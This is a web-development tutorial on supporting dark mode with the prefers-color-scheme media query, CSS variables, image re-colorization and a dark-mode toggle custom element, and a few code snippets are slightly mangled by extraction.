“it’s easier on the eyes,”_followed by _“it’s elegant and beautiful.” Apple in their Dark Mode developer documentation explicitly writes: “The choice of whether to enable a light or dark appearance is an aesthetic one for most users, and might not relate to ambient lighting conditions.” 👩🔬 Read up more on user research regarding why people want dark mode and how they use it. Dark mode as an accessibility tool There are also people who actually need dark mode and use it as another accessibility tool, for example, users with low vision. The earliest occurrence of such an accessibility tool I could find is System7’s CloseView feature, which had a toggle for Black on White and White on Black. While System 7 supported color, the default user interface was still black-and-white. These inversion-based implementations demonstrated their weaknesses once color was introduced. User research by Szpiro et al. on how people with low vision access computing devices showed that all interviewed users disliked inverted images, but that many preferred light text on a dark background. Apple accommodates for this user preference with a feature called Smart Invert, which reverses the colors on the display, except for images, media, and some apps that use dark color styles. A special form of low vision is Computer Vision Syndrome, also known as Digital Eye Strain, which is defined as “the combination of eye and vision problems associated with the use of computers (including desktop, laptop, and tablets) and other electronic displays (e.g. smartphones and electronic reading devices).” It has been proposed that the use of electronic devices by adolescents, particularly at night time, leads to an increased risk of shorter sleep duration, longer sleep-onset latency, and increased sleep deficiency. Additionally, exposure to blue light has been widely reported to be involved in the regulation of circadian rhythm and the sleep cycle, and irregular light environments may lead to sleep deprivation, possibly affecting mood and task performance, according to research by Rosenfield. To limit these negative effects, reducing blue light by adjusting the display color temperature through features like iOS’ Night Shift or Android’s Night Light can help, as well as avoiding bright lights or irregular lights in general through dark themes or dark modes. Dark mode power savings on AMOLED screens Finally, dark mode is known to save a lot of energy on AMOLED screens. Android case studies that focused on popular Google apps like YouTube have shown that the power savings can be up to 60%. The video below has more details on these case studies and the power savings per app. Activating dark mode in the operating system Now that I have covered the background of why dark mode is such a big deal for many users, let’s review how you can support it. Operating systems that support a dark mode or dark theme typically have an option to activate it somewhere in the settings. On macOS X, it’s in the system preference’s General section and called Appearance (screenshot), and on Windows 10, it’s in the Colors section and called Choose your color (screenshot). For Android Q, you can find it under Display as a Dark Theme toggle switch (screenshot), and on iOS 13, you can change the Appearance in the Display & Brightness section of the settings (screenshot). The prefers-color-scheme media query One last bit of theory before I get going. 5 introduces so-called user preference media features, that is, a way for sites to detect the user's preferred way to display content. ☝️ An established user preference media feature is prefers-reduced-motion that lets you detect the desire for less motion on a page. I have written aboutprefers-reduced-motion before. The prefers-color-scheme media feature is used to detect if the user has requested the page to use a light or dark color theme. It works with the following). Supporting dark mode Finding out if dark mode is supported by the browser As dark mode is reported through a media query, you can easily check if the current browser supports dark mode by checking if the media query prefers-color-schemematches at all. Note how I don't include any value, but purely check if the media query alone matches. if (window.matchMedia('(prefers-color-scheme)').media !== 'not all') { console.log('🎉 Dark mode is supported'); } At the time of writing, prefers-color-scheme is supported on both desktop and mobile (where available) by Chrome and Edge as of version 76, Firefox as of version 67, and Safari as of version 12.1 on macOS and as of version 13 on iOS. For all other browsers, you can check the Can I use support tables. There is a custom element <dark-mode-toggle>available that adds dark mode support to older browsers. I write about it further down in this article. Dark mode in practice Let’s finally see how supporting dark mode looks like in practice. Just like with the Highlander, with dark mode there can be only one: dark or light, but never both! Why do I mention this? Because this fact should have an impact on the loading strategy. Please don’t force users to download CSS in the critical rendering path that is for a mode they don’t currently use. To optimize load speed, I have therefore split my CSS for the example app that shows the following recommendations in practice into three parts in order to defer non-critical CSS: style.cssthat contains generic rules that are used universally on the site. dark.cssthat contains only the rules needed for dark mode. light.cssthat contains only the rules needed for light mode. The two latter ones, light.css and dark.css, are loaded conditionally with a <link media> query. Initially, not all browsers will supportprefers-color-scheme(detectable using the pattern above), which I deal with dynamically by loading the default light.css file via a conditionally inserted <link rel="stylesheet"> element in a minuscule inline script (light is an arbitrary choice, I could also have made dark the default fallback experience). To avoid a flash of unstyled content, I hide the content of the page until light.css has loaded. <script> // If `prefers-color-scheme` is not supported, fall back to light mode. // In this case, light.css will be downloaded with `highest` priority. if (window.matchMedia('(prefers-color-scheme)'): no-preference), (prefers-color-scheme: light)"> <!-- The main stylesheet --> <link rel="stylesheet" href="/style.css"> Stylesheet architecture I make maximum use of CSS variables, this allows my generic style.css to be, well, generic, and all the light or dark mode customization happens in the two other files dark.css and light.css. Below you can see an excerpt of the actual styles, but it should suffice to convey the overall idea. I declare two variables, --color and --background-color that essentially create a dark-on-light and a light-on-dark baseline theme. /* light.css: 👉 dark-on-light */ :root { --color: rgb(5, 5, 5); --background-color: rgb(250, 250, 250); } /* dark.css: 👉 light-on-dark */ :root { --color: rgb(250, 250, 250); --background-color: rgb(5, 5, 5); } In my style.css, I then use these variables in the body { … } rule. As they are defined on the :root CSS pseudo-class—a selector that in HTML represents the <html> element and is identical to the selector html, except that its specificity is higher—they cascade down, which serves me for declaring global CSS variables. /* style.css */ :root { color-scheme: light dark; } body { color: var(--color); background-color: var(--background-color); } In the code sample above, you will probably have noticed a property color-scheme with the space-separated value light dark. Warning: The color-scheme property is still in development and it might not work as advertised, full support in Chrome will come later this year. This tells the browser which color themes my app supports and allows it to activate special variants of the user agent stylesheet, which is useful to, for example, let the browser render form fields with a dark background and light text, adjust the scrollbars, or to enable a theme-aware highlight color. The exact details of color-scheme are specified in CSS Color Adjustment Module Level 1. 🌒 Read up more on what color-schemeactually does. Everything else is then just a matter of defining CSS variables for things that matter on my site. Semantically organizing styles helps a lot when working with dark mode. For example, rather than --highlight-yellow, consider calling the variable --accent-color, as "yellow" may actually not be yellow in dark mode or vice versa. Below is an example of some more variables that I use in my example. /* dark.css */ :root { --color: rgb(250, 250, 250); --background-color: rgb(5, 5, 5); --link-color: rgb(0, 188, 212); --main-headline-color: rgb(233, 30, 99); --accent-background-color: rgb(0, 188, 212); --accent-color: rgb(5, 5, 5); } /* light.css */ :root { --color: rgb(5, 5, 5); --background-color: rgb(250, 250, 250); --link-color: rgb(0, 0, 238); --main-headline-color: rgb(0, 0, 192); --accent-background-color: rgb(0, 0, 238); --accent-color: rgb(250, 250, 250); } Full example In the following Glitch embed, you can see the complete example that puts the concepts from above into practice. Try toggling dark mode in your particular operating system’s settings and see how the page reacts. When you play with this example, you can see why I load my dark.css and light.css via media queries. Try toggling dark mode and reload the page: the particular currently non-matching stylesheets are still loaded, but with the lowest priority, so that they never compete with resources that are needed by the site right now. 😲 Read up more on why browsers download stylesheets with non-matching media queries. Reacting on dark mode changes Like any other media query change, dark mode changes can be subscribed to via JavaScript. You can use this to, for example, dynamically change the favicon of a page or change the <meta name="theme-color"> that determines the color of the URL bar in Chrome. The full example above shows this in action, in order to see the theme color and favicon changes, open the demo in a separate tab. const darkModeMediaQuery = window.matchMedia('(prefers-color-scheme: dark)'); darkModeMediaQuery.addListener((e) => { const darkModeOn = e.matches; console.log(`Dark mode is ${darkModeOn ? '🌒 on' : '☀️ off'}.`); }); Dark mode best practices Avoid pure white A small detail you may have noticed is that I don’t use pure white. Instead, to prevent glowing and bleeding against the surrounding dark content, I choose a slightly darker white. Something like rgb(250, 250, 250) works well. Re-colorize and darken photographic images If you compare the two screenshots below, you will notice that not only the core theme has changed from dark-on-light to light-on-dark, but that also the hero image looks slightly different. My user research has shown that the majority of the surveyed people prefer slightly less vibrant and brilliant images when dark mode is active. I refer to this as re-colorization. Re-colorization can be achieved through a CSS filter on my images. I use a CSS selector that matches all images that don’t have .svg in their URL, the idea being that I can give vector graphics (icons) a different re-colorization treatment than my images (photos), more about this in the next paragraph. Note how I again use a CSS variable, so I can later on flexibly change my filter. 🎨 Read up more on user research regarding re-colorization preferences with dark mode. As re-colorization is only needed in dark mode, that is, when dark.css is active, there are no corresponding rules in light.css. /* dark.css */ --image-filter: grayscale(50%); img:not([src*=".svg"]) { filter: var(--image-filter); } Customizing dark mode re-colorization intensities with JavaScript Not everyone is the same and people have different dark mode needs. By sticking to the re-colorization method described above, I can easily make the grayscale intensity a user preference that I can change via JavaScript, and by setting a value of 0%, I can also disable re-colorization completely. Note that document.documentElementprovides a reference to the root element of the document, that is, the same element I can reference with the :rootCSS pseudo-class. const filter = 'grayscale(70%)'; document.documentElement.style.setProperty('--image-filter', value); Invert vector graphics and icons For vector graphics — that in my case are used as icons that I reference via <img> elements—I use a different re-colorization method. While research has shown that people don't like inversion for photos, it does work very well for most icons. Again I use CSS variables to determine the inversion amount in the regular and in the :hover state. Note how again I only invert icons in dark.css but not in light.css, and how :hover gets a different inversion intensity in the two cases to make the icon appear slightly darker or slightly brighter, dependent on the mode the user has selected. /* dark.css */ --icon-filter: invert(100%); --icon-filter_hover: invert(40%); img[src*=".svg"] { filter: var(--icon-filter); } /* light.css */ --icon-filter_hover: invert(60%); /* style.css */ img[src*=".svg"]:hover { filter: var(--icon-filter_hover); } Use currentColor for inline SVGs For inline SVG images, instead of using inversion filters, you can leverage the currentColor CSS keyword that represents the value of an element's color property. This lets you use the color value on properties that do not receive it by default. Conveniently, if currentColor is used as the value of the SVG fill orstrokeattributes, it instead takes its value from the inherited value of the color property. Even better: this also works for <svg><use href="…"></svg>, so you can have separate resources and currentColor will still be applied in context. Please note that this only works for inline or <use href="…"> SVGs, but not SVGs that are referenced as the src of an image or somehow via CSS. You can see this applied in the demo below. <!-- Some inline SVG --> <svg xmlns="" stroke="currentColor" > […] </svg> Smooth transitions between modes Switching from dark mode to light mode or vice versa can be smoothed thanks to the fact that both color and background-color are animatable CSS properties. Creating the animation is as easy as declaring two transitions for the two properties. The example below illustrates the overall idea, you can experience it live in thedemo. body { --duration: 0.5s; --timing: ease; color: var(--color); background-color: var(--background-color); transition: color var(--duration) var(--timing), background-color var(--duration) var(--timing); } Art direction with dark mode While for loading performance reasons in general I recommend to exclusively work with prefers-color-scheme in the media attribute of <link> elements (rather than inline in stylesheets), there are situations where you actually may want to work with prefers-color-scheme directly inline in your HTML code. Art direction is such a situation. On the web, art direction deals with the overall visual appearance of a page and how it communicates visually, stimulates moods, contrasts features, and psychologically appeals to a target audience. With dark mode, it’s up to the judgment of the designer to decide what is the best image at a particular mode and whether re-colorization of images is maybe not good enough. If used with the <picture> element, the <source> of the image to be shown can be made dependent on the media attribute. In the example below, I show the Western hemisphere for dark mode, and the Eastern hemisphere for light mode or when no preference is given, defaulting to the Eastern hemisphere in all other cases. This is of course purely for illustrative purposes. Toggle dark mode on your device to see the difference. <picture> <source s">"western.webp" media="(prefers-color-scheme: dark)"> <source s">"eastern.webp" media="(prefers-color-scheme: light), (prefers-color-scheme: no-preference)"> `<img src="eastern.webp"> </picture> Dark mode, but add an opt-out As mentioned in the why dark mode section above, dark mode is an aesthetic choice for most users. In consequence, some users may actually like to have their operating system UI in dark, but still prefer to see their webpages the way they are used to seeing them. A great pattern is to initially adhere to the signal the browser sends through prefers-color-scheme, but to then optionally allow users to override their system-level setting. The <dark-mode-toggle> custom element You can of course create the code for this yourself, but you can also just use a ready-made custom element (web component) that I have created right for this purpose. It’s called <dark-mode-toggle> and it adds a toggle (dark mode: on/off) or a theme switcher (theme: light/dark) to your page that you can fully customize. The demo below shows the element in action (oh, and I have also 🤫 silently snuck it in all of the other examples above). <dark-mode-toggle</dark-mode-toggle> Try clicking or tapping the dark mode controls in the upper right corner in the demo below. If you check the checkbox in the third and the fourth control, see how your mode selection is remembered even when you reload the page. This allows your visitors to keep their operating system in dark mode, but enjoy your site in light mode or vice versa. GoogleChromeLabs / dark-mode-toggle A custom element that allows you to easily put a Dark Mode 🌒 toggle or switch on your site: <dark-mode-toggle> Element A custom element that allows you to easily put a Dark Mode prefers-color-scheme but also allow them to (optionally permanently) override their system setting for just your site. Installation From npm: npm install --save dark-mode-toggle In the browser: import * as DarkModeToggle from ''; or import * as DarkModeToggle from ''; Usage media attribute in the stylesheet's corresponding link element. This is a great performance pattern as you don't force people to download CSS that they don't need based on their current theme preference, yet non-matching… Conclusions Working with and supporting dark mode is fun and opens up new design avenues. For some of your visitors it can be the difference between not being able to handle your site and being a happy user. There are some pitfalls and careful testing is definitely required, but dark mode is definitely a great opportunity for you to show that you care about all of your users. The best practices mentioned in this post and helpers like the <dark-mode-toggle> custom element should make you confident in your ability to create an amazing dark mode experience. Let me know on Twitterwhat you create and if this post was useful or also suggestions for improving it. Thanks for reading! 🌒 Related links Resources for the prefers-color-scheme media query: Resources for the color-scheme meta tag and CSS property: - Chrome Platform Status page - Chromium bug - CSS Color Adjustment Module Level 1 spec - CSS WG GitHub Issue for the meta tag and the CSS property - HTML WHATWG GitHub Issue for the meta tag General dark mode links: - Material Design — Dark Theme - Dark Mode in Web Inspector - Dark Mode Support in WebKit - Apple Human Interface Guidelines — Dark Mode Background research articles for this post: - What Does Dark Mode’s “supported-color-schemes” Actually Do? 🤔 - Let there be darkness! 🌚 Maybe… - Re-Colorization for Dark Mode Acknowledgements The prefers-color-scheme media feature, the color-scheme CSS property, and the related meta tag are the implementation work of 👏 Rune Lillesveen. Rune is also a co-editor of the CSS Color Adjustment Module Level 1spec. I would like to 🙏 thank Lukasz Zbylut, Rowan Merewood, Chirag Desai, and Rob Dodson for their thorough reviews of this article. The loading strategy is the brainchild of Jake Archibald. Emilio Cobos Álvarez has pointed me to the correct prefers-color-schemedetection method. The tip with referenced SVGs and currentColor came from Timothy Hatcher. Finally, I am thankful to the many anonymous participants of the various user studies that have helped shape the recommendations in this article. Hero image by Nathan Anderson. Discussion (0)
https://practicaldev-herokuapp-com.global.ssl.fastly.net/chromiumdev/hello-darkness-my-old-friend-3jcg
CC-MAIN-2021-25
refinedweb
3,780
52.49
Sudoku From HaskellWiki Revision as of 08:36, 11 April 2012 Here are a few Sudoku solvers coded up in Haskell... 1 Monadic non-deterministic solver Here is a solver by CaleGibbard. $ (n `notElem`) $ rs ++ cs ++ bs a <- get put (a // [((i,j),n)])., isDigit, digitToInt, intToDigit) (isDigit c) (digitToInt c) elemToChar :: Maybe Element -> Char elemToChar = maybe ' ' intToDig. Other trivia: It uses "mdo" and lazyness to initialize some of the doubly linked lists. 6 Very smart, with only a little guessing by ChrisKuklewicz. 7 Only guessing without dancing links by AndrewBromage This solver uses a different implementation of Knuth's algorithm, without using pointers. It instead relies on the fact that in Haskell, tree-like data structure (in this case, a Priority Search Queue) "undo" operations are essentially free. 8 9 Simple small solver I haven't looked at the other solvers in detail yet, so I'm not sure what is good or bad about mine, but here it is: -Brian Alliet <brian@brianweb.net> _ _ _ _ = [] 11 In-flight entertainment By Lennart Augustsson. 12 Sudoku incrementally, à la Bird -.) A full talk-through of the evolution of the code may be found under the course page. --Liyang 13:35, 27 July 2006 (UTC). 13) 14 A parallel solver A parallel version of Richard Bird's function pearl solver by Wouter Swierstra: 15 Another simple solver One day I wrote a completely naive sudoku solver which tried all possibilities to try arrays in Haskell. It works, however I doubt that I'll see it actually solve a puzzle during my remaining lifetime. So I set out to improve it. The new version still tries all possibilities, but it starts with the cell that has a minimal number of possibilities. import Array import List import System -- ([Possible Entries], #Possible Entries) type Field = Array (Int,Int) ([Int], Int) -- Fields are Strings of Numbers with 0 in empty cells readField ::String -> Field readField f = listArray ((1,1),(9,9)) (map (\j -> let n=read [j]::Int in if n==0 then ([0..9],9) else ([n],0)) f) -- x y wrong way -> reading wrong? no effect on solution though showField :: Field -> String showField f = unlines [concat [show $ entry (f!(y,x))|x<-[1..9]]|y<-[1..9]] printField :: Maybe Field -> String printField (Just f) = concat [concat [show $ entry f!(y,x))|x<-[1..9]]|y<-[1..9]] printField Nothing = "No solution" -- true if cell is empty isEmpty :: ([Int],Int) -> Bool isEmpty (xs,_) = xs == [0] entry :: ([Int],Int) -> Int entry = head.fst -- 0 possibilties left, no emtpy fields done :: Field -> Bool done a = let l=elems a in 0==foldr (\(_,x) y -> x+y) 0 l && all (not.isEmpty) l --return column/row/square containing coords (x,y), excluding (x,y) column::Field ->(Int,Int) -> [Int] column a ~(x,y)= [entry $ a!(i,y)|i<-[1..9],i/=x] row :: Field -> (Int,Int) -> [Int] row a ~(x,y)= [entry $ a!(x,j)|j<-[1..9],j/=y] square :: Field -> (Int, Int)-> [Int] square a ~(x,y) = block where n = head $ dropWhile (<x-3) [0,3,6] m = head $ dropWhile (<y-3) [0,3,6] block = [entry $ a!(i+n,j+m)|i<-[1..3],j<-[1..3],x/=i+n || y/=j+m] -- remove invalid possibilities remPoss :: Field -> Field remPoss f =array ((1,1),(9,9)) $ map remPoss' (assocs f) where others xy= filter (/=0) $ row f xy ++ column f xy ++ square f xy remPoss' ~(i,(xs,n)) | n/=0 = let nxs= filter ( `notElem` others i ) xs in (i,(nxs,length $ filter (/=0) nxs)) | otherwise = (i,(xs,n)) -- remove invalid fields, i.e. contains empty cell without filling possibilities remInv :: [Field] -> [Field] remInv = filter (all (\(_,(x,_)) -> x/=[0]).assocs) genMoves :: (Int,Int) -> Field -> [Field] genMoves xy f = remInv $ map remPoss [f // [(xy,([poss!!i],0))]|i<-[0..num-1]] where poss = tail $ fst (f!xy) num = snd (f!xy) --always try the entry with least possibilties first moves :: Field -> [Field] moves f = genMoves bestOne f where -- remove all with 0 possibilities, select the one with minimum possibilities bestOne =fst $ minimumBy (\(_,(_,n)) (_,(_,m)) -> compare n m) list list = ((filter (\(_,(_,x)) -> x/=0).assocs) f) play :: [Field] -> Maybe Field play (f:a) | done f= Just f | otherwise = play (moves f++a) play [] = Nothing -- reads a file with puzzles, path as argument main :: IO () main = do path <- getArgs inp<-readFile (path!!0) let x=lines inp let erg=map (printField.play) (map ((\x->[x]).remPoss.readField) x) writeFile "./out.txt" (unlines erg). 16 Constraint Propagation (a la Norvig) By Manu This is an Haskell implementation of Peter Norvig's sudoku solver (). It should solve, in a flash, the 95 puzzles found here : Thanks to Daniel Fischer for helping and refactoring., s `elem` u ]) | s <- squares] allPossibilities :: Grid allPossibilities = array box [ (s,digits) | s <- squares ] -- Parsing a grid into an Array parsegrid :: String -> Maybe Grid parsegrid g = do regularGrid g foldM assign allPossibilities (zip squares g) where regularGrid :: String -> Maybe String regularGrid g = if all (`elem` "0.-123456789") g then Just g else Nothing -- Propagating Constraints assign :: Grid -> (Square, Digit) -> Maybe Grid assign g (s,d) = if d `elem` digits -- check that we are assigning a digit and not a '.' then do let ds = g ! s toDump = delete d ds foldM eliminate g (zip (repeat s) toDump) else return g eliminate :: Grid -> (Square, Digit) -> Maybe Grid eliminate g (s,d) = let cell = g ! s in if d `notElem` cell then return g -- already eliminated -- else d is deleted from s' values else do let newCell = delete d cell newV = g // [(s,newCell)] newV2 <- case newCell of -- contradiction : Nothing terminates the computation [] -> Nothing -- if there is only one value left in s, remove it from peers [d'] -> do let peersOfS = peers ! s foldM eliminate newV (zip peersOfS (repeat d')) -- else : return the new grid _ -> return newV -- Now check the places where d appears in the peers of s foldM (locate d) newV2 (units ! s) locate :: Digit -> Grid -> Unit -> Maybe Grid locate d g u = case filter ((d `elem`) . -- [("1537"),("4"),...] = ys : sublist n zs where (ys,zs) = splitAt n xs line = hyphens ++ "+" ++ hyphens ++ "+" ++ hyphens hyphens = replicate 9 '-' main :: IO () main = do grids <- fmap lines $ readFile "top95.txt" mapM_ printGrid $ mapMaybe solve grids 17 Concurrent STM Solver Liyang wrote some applicative functor porn utilising STM. It's pretty but slow. Suggestions for speeding it up would be very welcome. 18 Chaining style Solver by jinjing It uses some snippets and the dot hack import Prelude hiding ((.)) import T.T import List import Data.Maybe import Data.Char import Data.Map(keys, elems) import qualified Data.Map as Map row i = i `div` 9 col i = i `mod` 9 row_list i positions = positions.select(on_i_row) where on_i_row pos = pos.row == i.row col_list i positions = positions.select(on_i_col) where on_i_col pos = pos.col == i.col grid_list i positions = positions.select(on_same_grid i) on_same_grid i j = on_same_row_grid i j && on_same_col_grid i j on_same_row_grid i j = ( i.row.mod.send_to(3) - j.row.mod.send_to(3) ) == i.row - j.row on_same_col_grid i j = ( i.col.mod.send_to(3) - j.col.mod.send_to(3) ) == i.col - j.col board = 0.upto 80 choices = 1.upto 9 related i positions = positions.row_list(i) ++ positions.col_list(i) ++ positions.grid_list(i) values moves positions = positions.mapMaybe (moves.let_receive Map.lookup) possible_moves i moves = let positions = moves.keys in choices \\ positions.related(i).values(moves) sudoku_move moves = let i = moves.next_pos in moves.possible_moves(i).map(Map.insert i).map_send_to(moves) next_pos moves = (board \\ moves.keys) .label_by(choice_size).sort.first.snd where choice_size i = moves.possible_moves(i).length solve solutions 0 = solutions solve solutions n = solve next_solutions (n-1) where next_solutions = solutions.map(sudoku_move).concat parse_input line = line.words.join("") .map(\c -> if '1' <= c && c <= '9' then c else '0') .map(digitToInt).zip([0..]).reject((==0).snd).Map.fromList pretty_output solution = solution.elems.map(show).in_group_of(9) .map(unwords).unlines sudoku line = solve [given] (81 - given.Map.size).first.pretty_output where given = parse_input line 19 Finite Domain Constraint Solver by David Overton This solver uses a finite domain constraint solver monad described here. The core functions are shown below. A full explanation is here. type Puzzle = [Int] sudoku :: Puzzle -> [Puzzle] sudoku puzzle = runFD $ do vars <- newVars 81 [1..9] zipWithM_ (\x n -> when (n > 0) (x `hasValue` n)) vars puzzle mapM_ allDifferent (rows vars) mapM_ allDifferent (columns vars) mapM_ allDifferent (boxes vars) labelling vars rows, columns, boxes :: [a] -> [[a]] rows = chunk 9 columns = transpose . rows boxes = concatMap (map concat . transpose) . chunk 3 . chunk 3 . chunk 3 chunk :: Int -> [a] -> [[a]] chunk _ [] = [] chunk n xs = ys : chunk n zs where (ys, zs) = splitAt n xs 20 Very fast Solver by Frank Kuehnel This solver implements constraint propagation with higher level logic and search. Solves the 49151 puzzles with 17 hints in less than 50 seconds! More detail and less optimized versions are here. module Main where import qualified Data.Vector.Unboxed as V import qualified Data.Vector as BV (generate,(!)) import Data.List (foldl',sort,group) import Data.Char (chr, ord) import Data.Word import Data.Bits import Control.Monad import Data.Maybe import System (getArgs) -- Types type Alphabet = Word8 type Hypothesis = Word32 -- Hypotheses space is a matrix of independed hypoteses type HypothesesSpace = V.Vector Hypothesis -- Set up spatial transformers / discriminators to reflect the spatial -- properties of a Sudoku puzzle ncells = 81 -- vector rearrangement functions rows :: HypothesesSpace -> HypothesesSpace rows = id columns :: HypothesesSpace -> HypothesesSpace columns vec = V.map (\cidx -> vec `V.unsafeIndex` cidx) cIndices where cIndices = V.fromList [r*9 + c | c <-[0..8], r<-[0..8]] subGrids :: HypothesesSpace -> HypothesesSpace subGrids vec= V.map (\idx -> vec `V.unsafeIndex` idx) sgIndices where sgIndices = V.fromList [i + bc + br | br <- [0,27,54], bc <- [0,3,6], i<-[0,1,2,9,10,11,18,19,20]] -- needs to be boxed, because vector elements are not primitives peersDiscriminators = BV.generate ncells discriminator where discriminator idx1 = V.zipWith3 (\r c s -> (r || c || s)) rDscr cDscr sDscr where rDscr = V.generate ncells (\idx2 -> idx1 `div` 9 == idx2 `div` 9) cDscr = V.generate ncells (\idx2 -> idx1 `mod` 9 == idx2 `mod` 9) sDscr = V.generate ncells (\idx2 -> subGridOfidx1 == subGrid idx2) where subGridOfidx1 = subGrid idx1 subGrid idx = (idx `div` 27, (idx `div` 3) `mod` 3) -- Let's implement the logic -- Level 0 logic (enforce consistency): -- We can't have multiple same solutions in a peer unit, -- eliminate solutions from other hypotheses enforceConsistency :: HypothesesSpace -> Maybe HypothesesSpace enforceConsistency hypS0 = do V.foldM solutionReduce hypS0 $ V.findIndices newSingle hypS0 solutionReduce :: HypothesesSpace -> Int -> Maybe HypothesesSpace solutionReduce hypS0 idx = let sol = hypS0 V.! idx peers = peersDiscriminators BV.! idx hypS1 = V.zipWith reduceInUnit peers hypS0 where reduceInUnit p h | p && (h == sol) = setSolution sol | p = h `minus` sol | otherwise = h in if V.any empty hypS1 then return hypS1 else if V.any newSingle hypS1 then enforceConsistency hypS1 -- constraint propagation else return hypS1 -- Level 1 logic is rather simple: -- We tally up all unknown values in a given unit, -- if a value occurs only once, then it must be the solution! localizeSingles :: HypothesesSpace -> Maybe HypothesesSpace localizeSingles unit = let known = maskChoices $ accumTally $ V.filter single unit in if dups known then Nothing else case (filterSingles $ accumTally $ V.filter (not . single) unit) `minus` known of 0 -> return unit sl -> return $ replaceWith unit sl where replaceWith :: V.Vector Hypothesis -> Hypothesis -> V.Vector Hypothesis replaceWith unit s = V.map (\u -> if 0 /= maskChoices (s .&. u) then s `Main.intersect` u else u) unit -- Level 2 logic is a bit more complicated: -- Say in a given unit, we find exactly two places with the hypothesis {1,9}. -- Then obviously, the value 1 and 9 can only occur in those two places. -- All other ocurrances of the value 1 and 9 can eliminated. localizePairs :: HypothesesSpace -> Maybe HypothesesSpace localizePairs unit = let pairs = V.toList $ V.filter pair unit in if nodups pairs then return unit else case map head $ filter lpair $ tally pairs of [] -> return unit pl@(p:ps) -> return $ foldl' eliminateFrom unit pl where -- "subtract" pair out of a hypothesis eliminateFrom :: V.Vector Hypothesis -> Hypothesis -> V.Vector Hypothesis eliminateFrom unit p = V.map (\u -> if u /= p then u `minus` p else u) unit -- Level 3 logic resembles the level 2 logic: -- If we find exactly three places with the hypothesis {1,7,8} in a given unit, then all other ... -- you'll get the gist! localizeTriples :: HypothesesSpace -> Maybe HypothesesSpace localizeTriples unit = let triples = V.toList $ V.filter triple unit in if nodups triples then return unit else case map head $ filter ltriple $ tally triples of [] -> return unit tl@(t:ts) -> return $ foldl' eliminateFrom unit tl where -- "subtract" triple out of a hypothesis eliminateFrom :: V.Vector Hypothesis -> Hypothesis -> V.Vector Hypothesis eliminateFrom unit t = V.map (\u -> if u /= t then u `minus` t else u) unit -- Even higher order logic is easy to implement, but becomes rather useless in the general case! -- Implement the whole nine yard: constraint propagation and search applySameDimensionLogic :: HypothesesSpace -> Maybe HypothesesSpace applySameDimensionLogic hyp0 = do res1 <- logicInDimensionBy rows chainedLogic hyp0 res2 <- logicInDimensionBy columns chainedLogic res1 logicInDimensionBy subGrids chainedLogic res2 where chainedLogic = localizeSingles >=> localizePairs >=> localizeTriples logicInDimensionBy :: (HypothesesSpace -> HypothesesSpace) -> (HypothesesSpace -> Maybe HypothesesSpace) -> HypothesesSpace -> Maybe HypothesesSpace logicInDimensionBy trafo logic hyp = liftM (trafo . V.concat) $ mapM (\ridx -> do logic $ V.unsafeSlice ridx 9 hyp') [r*9 | r<- [0..8]] where hyp' :: HypothesesSpace hyp' = trafo hyp prune :: HypothesesSpace -> Maybe HypothesesSpace prune hypS0 = do hypS1 <- applySameDimensionLogic =<< enforceConsistency hypS0 if V.any newSingle hypS1 then prune hypS1 -- effectively implemented constraint propagation else do hypS2 <- applySameDimensionLogic hypS1 if hypS1 /= hypS2 then prune hypS2 -- effectively implemented a fix point method else return hypS2 search :: HypothesesSpace -> Maybe HypothesesSpace search hypS0 | complete hypS0 = return hypS0 | otherwise = do msum [prune hypS1 >>= search | hypS1 <- expandFirst hypS0] -- guessing order makes a big difference!! expandFirst :: HypothesesSpace -> [HypothesesSpace] expandFirst hypS | suitable == [] = [] | otherwise = let (_, idx) = minimum suitable -- minimum is the preferred strategy! in map (\choice -> hypS V.// [(idx, choice)]) (split $ hypS V.! idx) where suitable = filter ((>1) . fst) $ V.toList $ V.imap (\idx e -> (numChoices e, idx)) hypS -- Some very useful tools: -- partition a list into sublists chop :: Int -> [a] -> [[a]] chop n [] = [] chop n xs = take n xs : chop n (drop n xs) -- when does a list have no duplicates nodups :: Eq a => [a] -> Bool nodups [] = True nodups (x:xs) = not (elem x xs) && nodups xs dups :: Hypothesis -> Bool dups t = (filterDups t) /= 0 tally :: Ord a => [a] -> [[a]] tally = group . sort empty :: Hypothesis -> Bool empty n = (maskChoices n) == 0 single :: Hypothesis -> Bool single n = (numChoices n) == 1 lsingle :: [a] -> Bool lsingle [n] = True lsingle _ = False pair :: Hypothesis -> Bool pair n = numChoices n == 2 lpair :: [a] -> Bool lpair (x:xs) = lsingle xs lpair _ = False triple :: Hypothesis -> Bool triple n = (numChoices n) == 3 ltriple :: [a] -> Bool ltriple (x:xs) = lpair xs ltriple _ = False complete :: HypothesesSpace -> Bool complete = V.all single -- The bit gymnastics (wish some were implemented in Data.Bits) -- bits 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 .. 27 28 29 30 31 represents -- h - h - h - h - h - h - h - h - h - .. s l l l l -- with -- h : 1 iff element is part of the hypothesis set -- l : 4 bits for the cached number of h bits set -- s : 1 iff a single solution for the cell is found -- experiment with different strategies split :: Hypothesis -> [Hypothesis] split 0 = [] split n = [n `minus` bit1, (bit 28) .|. bit1] where bit1 = (bit $ firstBit n) minus :: Hypothesis -> Hypothesis -> Hypothesis xs `minus` ys | maskChoices (xs .&. ys) == 0 = xs | otherwise = zs .|. ((countBits zs) `shiftL` 28) where zs = maskChoices $ xs .&. (complement ys) numChoices :: Hypothesis -> Word32 numChoices n = (n `shiftR` 28) newSingle :: Hypothesis -> Bool newSingle n = (n `shiftR` 27) == 2 isSolution :: Hypothesis -> Bool isSolution n = n `testBit` 27 setSolution :: Hypothesis -> Hypothesis setSolution n = n `setBit` 27 maskChoices :: Hypothesis -> Hypothesis maskChoices n = n .&. 0x07FFFFFF intersect :: Hypothesis -> Hypothesis -> Hypothesis intersect x y = z .|. ((countBits z) `shiftL` 28) where z = maskChoices $ x .&. y countBits :: Word32 -> Word32 -- would be wonderful if Data.Bits had such a function countBits 0 = 0 countBits n = (cBLH 16 0xFFFF . cBLH 8 0xFF00FF . cBLH 4 0x0F0F0F0F . cBLH 2 0x33333333 . cBLH 1 0x55555555) n cBLH :: Int -> Word32 -> Word32 -> Word32 cBLH s mask n = (n .&. mask) + (n `shiftR` s) .&. mask firstBit :: Hypothesis -> Int -- should also be in Data.Bits firstBit 0 = 0 -- stop recursion !! firstBit n | n .&. 1 > 0 = 0 | otherwise = (+) 1 $ firstBit $ n `shiftR` 1 accumTally :: V.Vector Hypothesis -> Hypothesis accumTally nl = V.foldl' accumTally2 0 nl accumTally2 :: Word32 -> Word32 -> Word32 accumTally2 t n = (+) t $ n .&. (((complement t) .&. 0x02AAAAAA) `shiftR` 1) 